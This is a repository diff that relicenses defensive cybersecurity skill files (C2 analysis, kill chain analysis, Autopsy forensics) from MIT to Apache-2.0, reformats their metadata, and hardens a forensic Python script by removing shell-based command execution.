          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,17 +1,34 @@
 ---
 name: analyzing-command-and-control-communication
-description: >
+description: 'Analyzes malware command-and-control (C2) communication protocols to
-  Analyzes malware command-and-control (C2) communication protocols to understand beacon
+  understand beacon patterns, command structures, data encoding, and infrastructure.
-  patterns, command structures, data encoding, and infrastructure. Covers HTTP, HTTPS, DNS,
+  Covers HTTP, HTTPS, DNS, and custom protocol C2 analysis for detection development
-  and custom protocol C2 analysis for detection development and threat intelligence.
+  and threat intelligence. Activates for requests involving C2 analysis, beacon detection,
-  Activates for requests involving C2 analysis, beacon detection, C2 protocol reverse
+  C2 protocol reverse engineering, or command-and-control infrastructure mapping.
-  engineering, or command-and-control infrastructure mapping.
+
  '
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware, C2, command-and-control, beacon, protocol-analysis]
+tags:
 - malware
 - C2
 - command-and-control
 - beacon
 - protocol-analysis
 version: 1.0.0
 author: mahipal
-license: MIT
+license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1071.001
 - T1573
 - T1571
 - T1008
 - T1095
 ---
 # Analyzing Command-and-Control Communication
@@ -3,13 +3,12 @@
 import statistics
 import base64
 import json
 import os
 import sys
 from collections import defaultdict
 try:
-    from scapy.all import rdpcap, IP, TCP, UDP, DNS, DNSQR, Raw
+    from scapy.all import rdpcap, IP, TCP, DNS, DNSQR
    HAS_SCAPY = True
 except ImportError:
    HAS_SCAPY = False
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,18 +1,37 @@
 ---
 name: analyzing-cyber-kill-chain
-description: >
+description: 'Analyzes intrusion activity against the Lockheed Martin Cyber Kill Chain
-  Analyzes intrusion activity against the Lockheed Martin Cyber Kill Chain framework to identify
+  framework to identify which phases an adversary has completed, where defenses succeeded
-  which phases an adversary has completed, where defenses succeeded or failed, and what controls
+  or failed, and what controls would have interrupted the attack at earlier phases.
-  would have interrupted the attack at earlier phases. Use when conducting post-incident analysis,
+  Use when conducting post-incident analysis, building prevention-focused security
-  building prevention-focused security controls, or mapping detection gaps to kill chain phases.
+  controls, or mapping detection gaps to kill chain phases. Activates for requests
-  Activates for requests involving kill chain analysis, intrusion kill chain, attack phase mapping,
+  involving kill chain analysis, intrusion kill chain, attack phase mapping, or Lockheed
-  or Lockheed Martin kill chain framework.
+  Martin kill chain framework.
  '
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [kill-chain, Lockheed-Martin, MITRE-ATT&CK, intrusion-analysis, defense-in-depth, NIST-CSF]
+tags:
 - kill-chain
 - Lockheed-Martin
 - MITRE-ATT&CK
 - intrusion-analysis
 - defense-in-depth
 - NIST-CSF
 version: 1.0.0
 author: team-cybersecurity
-license: MIT
+license: Apache-2.0
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1566.001
 - T1190
 - T1547.001
 - T1071.001
 - T1486
 ---
 # Analyzing Cyber Kill Chain
@@ -1,9 +1,6 @@
 #!/usr/bin/env python3
 """Cyber Kill Chain analysis agent for mapping incidents to Lockheed Martin kill chain phases."""
 import json
 import os
 import sys
 import datetime
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,12 +1,29 @@
 ---
 name: analyzing-disk-image-with-autopsy
-description: Perform comprehensive forensic analysis of disk images using Autopsy to recover files, examine artifacts, and build investigation timelines.
+description: Perform comprehensive forensic analysis of disk images using Autopsy
  to recover files, examine artifacts, and build investigation timelines.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, autopsy, disk-analysis, sleuth-kit, file-recovery, artifact-analysis]
+tags:
-version: "1.0"
+- forensics
 - autopsy
 - disk-analysis
 - sleuth-kit
 - file-recovery
 - artifact-analysis
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1005
 - T1074.001
 - T1070.004
 - T1083
 ---
 # Analyzing Disk Image with Autopsy
@@ -1,6 +1,7 @@
 #!/usr/bin/env python3
 """Forensic disk image analysis agent using The Sleuth Kit (TSK) command-line tools."""
 import shlex
 import subprocess
 import os
 import sys
@@ -10,8 +11,10 @@ import datetime
 def run_cmd(cmd):
-    """Execute a shell command and return output."""
+    """Execute a command and return output."""
-    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
+    if isinstance(cmd, str):
        cmd = shlex.split(cmd)
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
    return result.stdout.strip(), result.stderr.strip(), result.returncode
@@ -93,9 +96,15 @@ def list_deleted_files(image_path, offset):
 def recover_file(image_path, offset, inode, output_path):
    """Recover a file by inode using icat."""
-    cmd = f"icat -o {offset} {image_path} {inode} > {output_path}"
+    result = subprocess.run(
-    _, _, rc = run_cmd(cmd)
+        ["icat", "-o", str(offset), image_path, str(inode)],
-    return rc == 0
+        capture_output=True,
        timeout=120,
    )
    if result.returncode == 0:
        with open(output_path, "wb") as f:
            f.write(result.stdout)
    return result.returncode == 0
 def get_file_metadata(image_path, offset, inode):
@@ -106,26 +115,40 @@ def get_file_metadata(image_path, offset, inode):
 def create_bodyfile(image_path, offset, output_path):
    """Generate a TSK bodyfile for timeline creation."""
-    cmd = f'fls -r -m "/" -o {offset} {image_path} > {output_path}'
+    result = subprocess.run(
-    _, _, rc = run_cmd(cmd)
+        ["fls", "-r", "-m", "/", "-o", str(offset), image_path],
-    return rc == 0
+        capture_output=True, text=True,
        timeout=120,
    )
    if result.returncode == 0:
        with open(output_path, "w") as f:
            f.write(result.stdout)
    return result.returncode == 0
 def generate_timeline(bodyfile_path, output_csv, start_date=None, end_date=None):
    """Generate a timeline from a bodyfile using mactime."""
-    cmd = f"mactime -b {bodyfile_path} -d"
+    cmd = ["mactime", "-b", bodyfile_path, "-d"]
    if start_date and end_date:
-        cmd += f" {start_date}..{end_date}"
+        cmd.append(f"{start_date}..{end_date}")
-    cmd += f" > {output_csv}"
+    result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
-    _, _, rc = run_cmd(cmd)
+    if result.returncode == 0:
-    return rc == 0
+        with open(output_csv, "w") as f:
            f.write(result.stdout)
    return result.returncode == 0
 def search_keywords(image_path, offset, keyword):
    """Search for keyword strings in the disk image."""
-    cmd = f'srch_strings -a -o {offset} {image_path} | grep -i "{keyword}"'
+    result = subprocess.run(
-    stdout, _, rc = run_cmd(cmd)
+        ["srch_strings", "-a", "-o", str(offset), image_path],
-    return stdout.splitlines() if rc == 0 else []
+        capture_output=True, text=True,
        timeout=120,
    )
    if result.returncode != 0 or not result.stdout:
        return []
    keyword_lower = keyword.lower()
    return [line for line in result.stdout.splitlines() if keyword_lower in line.lower()]
 def find_file_signature(image_path, offset, hex_signature):
@@ -179,7 +202,8 @@ if __name__ == "__main__":
    if len(sys.argv) > 1:
        image = sys.argv[1]
-        case = sys.argv[2] if len(sys.argv) > 2 else "/tmp/autopsy_case"
+        import tempfile
        case = sys.argv[2] if len(sys.argv) > 2 else os.environ.get("AUTOPSY_CASE_DIR", os.path.join(tempfile.gettempdir(), "autopsy_case"))
        if os.path.exists(image):
            analyze_image(image, case)
        else:
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
